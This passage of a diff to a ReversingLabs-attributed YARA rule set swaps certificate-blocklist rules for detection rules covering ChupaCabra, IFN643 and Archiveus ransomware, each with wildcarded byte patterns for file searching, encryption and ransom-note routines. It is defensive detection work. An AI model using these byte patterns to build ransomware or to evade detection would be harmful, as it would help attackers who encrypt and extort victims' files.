+            ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7
+            85 ?? ?? ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83
+            F9 ?? 72 ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 59 8D 4D ?? 85 C0 74 ?? 88 19 41 83 E8 ?? 75 ?? 39 9D ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8
+        }
+		$encrypt_files = {
+            50 51 51 FF B5 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B BD ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CE 85 C0 74 ?? C6 01 ?? 41 83 E8 ?? 75 ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C0 ?? 74 ?? 39 85 ?? ?? ?? ?? 72 ?? 50 8D 85 ?? ?? ??
+            ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
+            C4 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 59 57 40 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 6A ?? FF B5 ?? ?? ?? ?? 6A
+            ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? D1 EF 6A ?? 5A 74 ??
+            8B 9D ?? ?? ?? ?? 4B 03 DE 8A 03 8A 0C 32 88 04 32 42 88 0B 4B 3B D7 72 ?? 8B 9D ??
+            ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 03 C3 56 50 E8 ?? ?? ?? ?? 03 DF 56
+            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 47 81 C6 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
+            B9 ?? ?? ?? ?? F7 F1 83 C4 ?? 40 3B F8 0F 82
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jessica Karam" and pe.signatures [ i ] . serial == "09:79:61:67:33:e0:62:c5:44:df:0a:bd:31:5e:3b:92" and 1408319999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7D3250B27E0547C77307030491B42802 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Chupacabra : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ChupaCabra ransomware."
 		author = "ReversingLabs"
-		id = "54073485-e9a5-5a0b-a907-0e8a528da85d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e44a101d-53c3-51f2-84ca-f6a5858c169b"
+		date = "2021-10-12"
+		modified = "2021-10-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1198-L1214"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "65f036921dfb9cbce3275aefb7111711e50874440096b2e3c3b55190cfc14ddb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.ChupaCabra.yara#L1-L90"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7f247778e0bd8057670abf42b2d1011ebae891ffcb21ebad50060f9a7986bf93"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ChupaCabra"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Banco do Brasil S.A." and pe.signatures [ i ] . serial == "7d:32:50:b2:7e:05:47:c7:73:07:03:04:91:b4:28:02" and 1412207999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_00D1836Bd37C331A67 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4d99e2ee-823e-568d-88b1-48aaf6d44286"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1216-L1234"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8af1d10085c5be8924eb6e4ea3a9b8e936c7706d8ec43d42f24a9a293c7f9d27"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 14 0A 14 0B 7E ?? ?? ?? ?? 7E ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 73 ?? ?? ?? ?? 13 ?? 73 ??
+            ?? ?? ?? 0A 06 08 06 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
+            ?? 11 ?? 16 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0B DE
+            ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ??
+            11 ?? 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 07 2A
+        }
+		$encrypt_files_p2 = {
+            02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 0A 02 06 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ??
+            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? ?? 8D ?? ??
+            ?? ?? 0B 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 0D 09 07 09 8E 69 28 ?? ?? ?? ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 19 28
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 02 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 17 5F 17 33 ?? 11 ?? 17 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ??
+            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ??
+            ?? 8D ?? ?? ?? ?? 13 ?? 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 19 28
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 26 DE ??
+            2A
+        }
+		$find_files_p1 = {
+            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 16 0C 2B ?? 06 08 9A 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 08 9A 28 ?? ?? ?? ?? 08 17 58 0C 08 06 8E 69 32 ?? 16 0D
+            2B ?? 07 09 9A 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 32 ?? DE ?? 26 DE ?? 2A
+        }
+		$find_files_p2 = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
+            ?? 1F ?? 8D ?? ?? ?? ?? 25 16 1E 28 ?? ?? ?? ?? A2 25 17 1F ?? 28 ?? ?? ?? ?? A2 25 18
+            1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 ?? ?? ?? ?? A2 25
+            1B 1B 28 ?? ?? ?? ?? A2 25 1C 1C 28 ?? ?? ?? ?? A2 25 1D 1F ?? 28 ?? ?? ?? ?? A2 25 1E
+            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
+            A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1B 28 ??
+            ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ??
+            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
+            A2 0A 16 0B 2B ?? 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? 2A
+        }
+		$drop_ransom_note = {
+            7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ??
+            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E
+            ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ??
+            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 26 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 26 73 ?? ?? ?? ?? 0A 7E ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 26 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MINDSTORM LLC" and ( pe.signatures [ i ] . serial == "00:d1:83:6b:d3:7c:33:1a:67" or pe.signatures [ i ] . serial == "d1:83:6b:d3:7c:33:1a:67" ) and 1422835199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2Ca028D1A4De0Eb743135Edecf74D7Af : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_IFN643 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects IFN643 ransomware."
 		author = "ReversingLabs"
-		id = "19e1bce7-ad37-5223-b934-b20e78dfd071"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a4d211a7-6735-541e-885d-555bbc11e2cf"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1236-L1252"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "60b6351194e23153d425eaa0c25f840080a29abb5eb1bbcd41bb76a3d4130edd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.IFN643.yara#L1-L90"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ced234018f1f05601dd3be55eaecd2a1e116ad0b7bb9e0292434f11f19916ebe"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "IFN643"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2c:a0:28:d1:a4:de:0e:b7:43:13:5e:de:cf:74:d7:af" and 1341792000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Dbb14Dcf973Eada14Ece7Ea79C895C11 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "139f2e4f-7997-5cfd-aba2-dcf8d7525f5e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1254-L1270"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c73c83f5cb6d840b887e1aa41e96a29529f975434ac27a5aa57f2e14b342f63d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_files_1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B D6 C7 45 ?? ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8
+            ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ??
+            83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ??
+            ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB
+            ?? 0F 84
+        }
+		$search_files_2 = {
+            80 BD ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 75 ?? 33
+            C0 EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 85 ?? ?? ?? ??
+            50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7
+            E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ??
+            ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ??
+            ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ??
+            0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ??
+            8B 35 ?? ?? ?? ?? 33 DB 2B CE C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F7 E9 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C1 FA ?? 8B C2 C6 85 ?? ?? ?? ?? ?? C1 E8 ?? 03 C2 74 ?? 33 FF ?? ?? ??
+            8D 45 ?? 8D 0C 37 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 89 45 ?? 8D 45 ?? 0F 43
+            45 ?? C6 00 ?? 8B 35 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B CE 43 F7 E9 83
+            C7 ?? C1 FA ?? 8B C2 C1 E8 ?? 03 C2 3B D8 72 ?? 83 7D ?? ?? 76 ?? 8D 45 ?? B9 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 E9 C1
+            FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
+            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
+            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ??
+            ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83
+            F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ??
+            8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76
+            ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1
+            ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8
+            ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ??
+            83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41
+            ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8
+            ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B C2 89 45 ?? 8B F9 8B 75 ?? 89 75 ??
+            C7 45 ?? ?? ?? ?? ?? 90 3B F8 0F 84 ?? ?? ?? ?? 89 75 ?? C6 45 ?? ?? 85 F6 74 ?? 8B
+            17 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46
+            ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? 8B C6 C6 00 ?? 80 3A ?? 75 ?? 33 C0 EB ?? 8B C2 8D
+            58 ?? 66 90 8A 08 40 84 C9 75 ?? 2B C3 50 52 8B CE E8 ?? ?? ?? ?? 8B 45 ?? 83 C6 ??
+            C6 45 ?? ?? 89 75 ?? 83 C7 ?? EB ?? 8B 55 ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
+            2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9
+            ?? ?? ?? ?? 33 C0 57 8B F9 40 F0 0F C1 05 ?? ?? ?? ?? 75 ?? 56 BE ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C6 ?? 59 81 FE ?? ?? ?? ?? 7C ?? 5E 8B C7 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "db:b1:4d:cf:97:3e:ad:a1:4e:ce:7e:a7:9c:89:5c:11" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files_1 and $search_files_2 and $encrypt_files
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F8C2239De3977B8D4A3Dcbedc9031A51 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Archiveus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Archiveus ransomware."
 		author = "ReversingLabs"
-		id = "3e102d0a-30e3-5f0a-9b67-a5fd15117e69"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "89e5af93-1153-5367-a539-6af77c99c214"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1272-L1288"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aa4f39790bc58b0a50e05e7670abad654d7f3d73e500bd5f054fece4a979ebfa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Archiveus.yara#L3-L50"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b8a42b98ab3e8b97d2e226e979f342a6a72f21d8f068f59c21ad95764077f8a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Archiveus"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "f8:c2:23:9d:e3:97:7b:8d:4a:3d:cb:ed:c9:03:1a:51" and 1341792000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Caad8222705D3Fb3430E114A31C8C6A4 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "d95b5e25-679c-57f8-b790-8f5633a23e4b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1290-L1306"
